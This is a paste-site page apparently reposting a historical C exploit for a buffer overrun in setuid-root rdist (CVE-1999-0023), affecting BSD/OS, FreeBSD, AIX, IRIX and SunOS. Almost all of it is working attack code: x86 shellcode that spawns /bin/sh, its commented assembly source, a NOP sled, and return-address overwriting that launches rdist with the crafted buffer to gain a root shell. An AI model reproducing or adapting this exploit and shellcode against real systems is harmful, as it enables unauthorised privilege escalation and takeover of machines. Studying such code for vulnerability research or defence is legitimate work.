BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Buffer Overrun - CVE-1999-0023

SUBMITTED BY: FlyFar

DATE: May 16, 2024, 3:47 a.m.

FORMAT: C

SIZE: 2.8 kB

Raw Download

HITS: 440

Report
  1. /*
  2. source: https://www.securityfocus.com/bid/129/info
  4. Rdist is a program to maintain identical copies of files over multiple hosts. It preserves the owner, group, mode, and mtime of files if possible and can update programs that are executing. Rdist reads commands from distfile to direct the updating of files and/or directories.
  6. Rdist has over time been notorious for security vulnerabilities. In this instance it is vulnerable to a buffer overrun from user supplied data. Given that rdist is setuid root in some enviroments the attacker can excecute this buffer overflow with the resulting commands they craft being executed as root.
  7. */
  9. /* cut here Brian Mitchell (brian@saturn.net) */
  10. #include <stdio.h>
  11. #include <stdlib.h>
  12. #include <unistd.h>
  14. #define DEFAULT_OFFSET 50
  15. #define BUFFER_SIZE 256
  17. long get_esp(void)
  18. {
  19. __asm__("movl %esp,%eax\n");
  20. }
  22. main(int argc, char **argv)
  23. {
  24. char *buff = NULL;
  25. unsigned long *addr_ptr = NULL;
  26. char *ptr = NULL;
  28. /* so you dont have to disassemble it, here is the asm code:
  29. start:
  30. jmp endofk0dez
  31. realstart:
  32. popl %esi
  33. leal (%esi), %ebx
  34. movl %ebx, 0x0b(%esi)
  35. xorl %edx, %edx
  36. movl %edx, 7(%esi)
  37. movl %edx, 0x0f(%esi)
  38. movl %edx, 0x14(%esi)
  39. movb %edx, 0x19(%esi)
  40. xorl %eax, %eax
  41. movb $59, %al
  42. leal 0x0b(%esi), %ecx
  43. movl %ecx, %edx
  44. pushl %edx
  45. pushl %ecx
  46. pushl %ebx
  47. pushl %eax
  48. jmp bewm
  49. endofk0dez:
  50. call realstart
  51. .byte '/', 'b', 'i', 'n', '/', 's', 'h'
  52. .byte 1, 1, 1, 1
  53. .byte 2, 2, 2, 2
  54. .byte 3, 3, 3, 3
  55. bewm:
  56. .byte 0x9a, 4, 4, 4, 4, 7, 4
  57. */
  59. char execshell[] =
  60. "\xeb\x23"
  61. "\x5e"
  62. "\x8d\x1e"
  63. "\x89\x5e\x0b"
  64. "\x31\xd2"
  65. "\x89\x56\x07"
  66. "\x89\x56\x0f"
  67. "\x89\x56\x14"
  68. "\x88\x56\x19"
  69. "\x31\xc0"
  70. "\xb0\x3b"
  71. "\x8d\x4e\x0b"
  72. "\x89\xca"
  73. "\x52"
  74. "\x51"
  75. "\x53"
  76. "\x50"
  77. "\xeb\x18"
  78. "\xe8\xd8\xff\xff\xff"
  79. "/bin/sh"
  80. "\x01\x01\x01\x01"
  81. "\x02\x02\x02\x02"
  82. "\x03\x03\x03\x03"
  83. "\x9a\x04\x04\x04\x04\x07\x04";
  85. int i;
  86. int ofs = DEFAULT_OFFSET;
  88. /* if we have a argument, use it as offset, else use default */
  89. if(argc == 2)
  90. ofs = atoi(argv[1]);
  91. /* print the offset in use */
  92. printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
  94. buff = malloc(4096);
  95. if(!buff)
  96. {
  97. printf("can't allocate memory\n");
  98. exit(0);
  99. }
  100. ptr = buff;
  101. /* fill start of buffer with nops */
  102. memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  103. ptr += BUFFER_SIZE-strlen(execshell);
  104. /* stick asm code into the buffer */
  105. for(i=0;i < strlen(execshell);i++)
  106. *(ptr++) = execshell[i];
  107. /* write the return addresses
  108. **
  109. ** return address 4
  110. ** ebp 4
  111. ** register unsigned n 0
  112. ** register char *cp 0
  113. ** register struct syment *s 0
  114. **
  115. ** total: 8
  116. */
  117. addr_ptr = (long *)ptr;
  118. for(i=0;i < (8/4);i++)
  119. *(addr_ptr++) = get_esp() + ofs;
  120. ptr = (char *)addr_ptr;
  121. *ptr = 0;
  122. execl("/usr/bin/rdist", "rdist", "-d", buff, "-d", buff, NULL);
  123. }
  124. /* cut here */
comments powered by Disqus